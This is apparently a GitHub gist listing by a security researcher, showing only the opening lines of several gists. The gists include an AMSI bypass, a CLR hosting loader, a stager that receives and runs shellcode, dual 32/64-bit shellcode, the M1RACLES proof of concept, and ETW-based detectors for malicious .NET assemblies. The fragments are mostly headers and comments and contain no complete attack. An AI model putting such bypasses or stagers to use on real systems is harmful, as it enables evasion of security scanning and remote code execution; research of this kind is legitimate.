mkdir C:/temp/
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri "https://www.python.org/ftp/python/3.7.0/python-3.7.0.exe" -OutFile "c:/temp/python-3.7.0.exe"
c:/temp/python-3.7.0.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Exception-Based AMSI Bypass | |
| // by aaaddress1@chroot.org | |
| #include <amsi.h> | |
| #include <iostream> | |
| #include <Windows.h> | |
| #pragma comment(lib, "amsi.lib") | |
| #pragma comment(lib, "ole32.lib") | |
| #pragma warning( disable : 4996 ) | |
| #define AMSIPROJECTNAME L"scanner" |
aaaddress1
/ clrHosting_v4.0.cpp
Last active
March 22, 2024 14:50
CLR Hosting: running dotNet binary in C/C++ & rewrite from .NET(4+) COM interface
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // CLR Hosting, by aaaddress1@chroot.org | |
| // | |
| // it's a new edition rewrite for .NET(4+) COM interface | |
| // original from github.com/etormadiv/HostingCLR | |
| // & blog.xpnsec.com/hiding-your-dotnet-etw | |
| // | |
| // this PoC supports the following .NET entry: | |
| // >>>> static void Main(string[] args); | |
| // | |
| #include <stdio.h> |
aaaddress1
/ win_iPython_ps1.md
Last active
June 23, 2021 11:03
Guide: Install iPython on Windows 10 via PowerShell
aaaddress1
/ dotnet-runtime-etw.py
Created
June 22, 2021 15:08
— forked from countercept/dotnet-runtime-etw.py
A research aid for tracing security relevant events in the CLR via ETW for detecting malicious assemblies.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import time | |
| import etw | |
| import etw.evntrace | |
| import sys | |
| import argparse | |
| import threading | |
| class RundownDotNetETW(etw.ETW): | |
| def __init__(self, verbose, high_risk_only): |
aaaddress1
/ etw_ClrTracker.cpp
Last active
May 3, 2024 22:10
use ETW (Event Tracing for Windows) to get notification of loaded CLR modules
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ETW CLR Tracker, by aaaddress1@chroot.org | |
| // rewrite from post "Hiding your .NET - ETW" | |
| // URL: https://blog.xpnsec.com/hiding-your-dotnet-etw/ | |
| #define AssemblyDCStart_V1 155 | |
| #define AssemblyLoad_V1 154 | |
| #define MethodLoadVerbose_V1 143 | |
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <wbemidl.h> |
aaaddress1
/ stager.cc
Created
June 5, 2021 17:58
simple stager: using ncat to send shellcode payload, recv & execute.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // simple stager, by aaaddress1@chroot.org | |
| // using ncat to send shellcode payload, recv & execute. | |
| #include <WS2tcpip.h> | |
| #include <stdio.h> | |
| #include <shlobj.h> | |
| #include <Windows.h> | |
| #include <shlwapi.h> | |
| #include <winsock2.h> | |
| #pragma warning(disable:4996) | |
| #pragma comment(lib, "ws2_32.lib") |
aaaddress1
/ inputLockToZhTW.cpp
Created
June 2, 2021 13:26
swich IME (Input Method Editor) to Zh-TW chinese on specific window
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // [Experiment] swich IME to Traditional Chinese | |
| // $ g++ -m32 -static inputLockToZhTW.cpp && a | |
| // test on League of Legends (TW) client, but got ignored :( | |
| // by aaaddress1@chroot.org | |
| #include <windows.h> | |
| #include <iostream> | |
| int main(void) { | |
| for (char buf[64]; ; Sleep(150)) { | |
| GetWindowTextA(GetForegroundWindow(), buf, sizeof(buf)); | |
| // once found that LOL client is on the top, and send IME change requests |
aaaddress1
/ m1racles-poc.c
Created
June 1, 2021 14:10
— forked from marcan/m1racles-poc.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1. | |
| * | |
| * This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register. | |
| * | |
| * Please visit m1racles.com for more information. | |
| * | |
| * Licensed under the MIT license. | |
| */ |
aaaddress1
/ x96_shellcode.py
Created
May 19, 2021 05:45
Python Script to Generate x96 Windows Shellcode
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # x96_shellcode.py | |
| # ref: gist.github.com/aaaddress1/3c0ae754f8a40024881343a085954049 | |
| # by aaaddress1@chroot.org | |
| ''' | |
| entry: | |
| call $+5 | |
| mov ax, cs | |
| sub ax, 23h | |
| je retTo32b | |
| nop |
aaaddress1
/ x96shell_msgbox.asm
Created
May 7, 2021 07:31
x96 Windows Shellcode: one payload able to used in both 32-bit & 64-bit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; x96 shellcode (x32+x64) by aaaddress1@chroot.org | |
| ; yasm -f bin -o x96shell_msgbox x96shell_msgbox.asm | |
| section .text | |
| bits 32 | |
| _main: | |
| call entry | |
| entry: | |
| mov ax, cs | |
| sub ax, 0x23 | |
| jz retTo32b |